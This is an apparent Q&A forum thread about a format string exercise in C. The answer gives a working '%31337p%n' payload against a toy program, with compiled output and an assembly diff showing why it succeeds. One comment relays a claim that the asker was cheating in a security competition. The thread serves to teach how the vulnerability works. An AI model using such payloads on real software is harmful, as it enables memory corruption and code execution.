# Format string attack in printf

Tags: c, security, printf, exploit, format-string

```
#include <stdio.h>
int main()
{
    char s[200]
    int a=123;
    int b=&a;
    scanf("%50s",s);
    printf(s);

    if (a==31337)
        func();
}
```

The aim is to execute a format string attack - to execute func() by inputting a string. I tried to use %n to overwrite the variable but I came to conclusion is that it is impossible without displaying b variable first and I have no idea how. Any hint would be appreciated. Sorry for my bad english.

Comment: `printf(s)`, where `s` is input by the user, is inherently unsafe -- which I suppose is the point of your question. Any such attack can and should be avoided simply by not writing that. Format strings should almost always be string literals.

Comment: `int b=&a;` is invalid. Did you mean `int *b=&a;`?

Comment: Yes that's exactly my question. This is an exercise I am supposed to do. Could anyone provide example how to execute func() by inputting a string?

Comment: There was an answer that probably should have been a comment. I don't think you can see it; you have a certain number of points to see deleted posts. It was (supposedly) from Jacek Tomasiewicz, the administrator of ILOcamp. I expect you'll be hearing more through other channels.

Comment: Typo: I meant to type "you have **to have** a certain number of points to see deleted posts".

Comment: No point in being coy, here's what the deleted answer said:
*This user is trying to get an answer for one of security competitions on polish camp "ILOcamp: which is taking place right now. Jaroszewski Piotr will be disqualified for cheating.

Administrator of ILOcamp, Jacek Tomasiewicz.*

Comment: @KeithThompson `int b=&a;` isn't invalid on platforms where `sizeof(int) >= sizeof(void *)`, is it?

Comment: @cdhowie: It certainly is. The C standard says it's a constraint violation, which means that any conforming compiler must issue a diagnostic. (The diagnostic can be a warning, and the compiler can do what it likes after issuing the warning.) Bottom line: pointers are not integers, and there is no implicit conversion between pointer= and integer types (other than the special case of a null pointer constant such as `0`).

Answer (score 1):

Let's try with and without printing:

```
$ cat > f.c << \EOF
#include <stdio.h>
void func() {
    fprintf(stderr, "func\n");
}

int main()
{
    char s[200];
    int a=123;
    int b=&a;
    #ifdef FIXER
    fprintf(stderr, "%p\n", b); /* make "b" actually used somewhere */
    #endif
    scanf("%50s",s);
    printf(s);

    if (a==31337)
        func();
}
EOF

$ gcc --version | head -n 1; uname -m
gcc (Debian 4.7.2-5) 4.7.2
i686

$ gcc -S  f.c -o doesnt_work.s
f.c: In function 'main':
f.c:10:11: warning: initialization makes integer from pointer without a cast [enabled by default]
$ gcc -S -DFIXER  f.c -o does_work.s
f.c: In function 'main':
f.c:10:11: warning: initialization makes integer from pointer without a cast [enabled by default]

$ gcc doesnt_work.s -o doesnt_work; gcc does_work.s -o does_work


$ echo '%31337p%n' | ./does_work > /dev/null
0xbfe75970
func

$ echo '%31337p%n' | ./doesnt_work > /dev/null
Segmentation fault
```

As stated in the question, we clearly see that without printing `b` first it fails.

Let's compare what is hapenning inside:

```
$ diff -ur does_work.s doesnt_work.s
--- does_work.s 2013-02-06 03:17:06.000000000 +0300
+++ doesnt_work.s   2013-02-06 03:16:52.000000000 +0300
@@ -29,8 +29,6 @@
    .size   func, .-func
    .section    .rodata
 .LC1:
-   .string "%p\n"
-.LC2:
    .string "%50s"
    .text
    .globl  main
@@ -48,15 +46,9 @@
    movl    $123, 16(%esp)
    leal    16(%esp), %eax
    movl    %eax, 220(%esp)
-   movl    stderr, %eax
-   movl    220(%esp), %edx    /* !!! */
-   movl    %edx, 8(%esp)      /* !!! */
-   movl    $.LC1, 4(%esp)
-   movl    %eax, (%esp)
-   call    fprintf
    leal    20(%esp), %eax
    movl    %eax, 4(%esp)
-   movl    $.LC2, (%esp)
+   movl    $.LC1, (%esp)
    call    __isoc99_scanf
    leal    20(%esp), %eax
    movl    %eax, (%esp)
```

On marked lines we see "get value of `b` into %edx, then put it as 3'rd argument in stack."

As printf and scanf use cdecl call convention, the stack remains more or less the same across invocations, so that third argument remains available for the vulnerable `printf` for setting.

When we don't print `b`, it does not get into stack to be easily available for our injected format string.

With enough `%p%p%p%p%p%p...` we should be able to reach our actual `a` or `b` anyway, but the limitation of 50 input characters is getting in our way.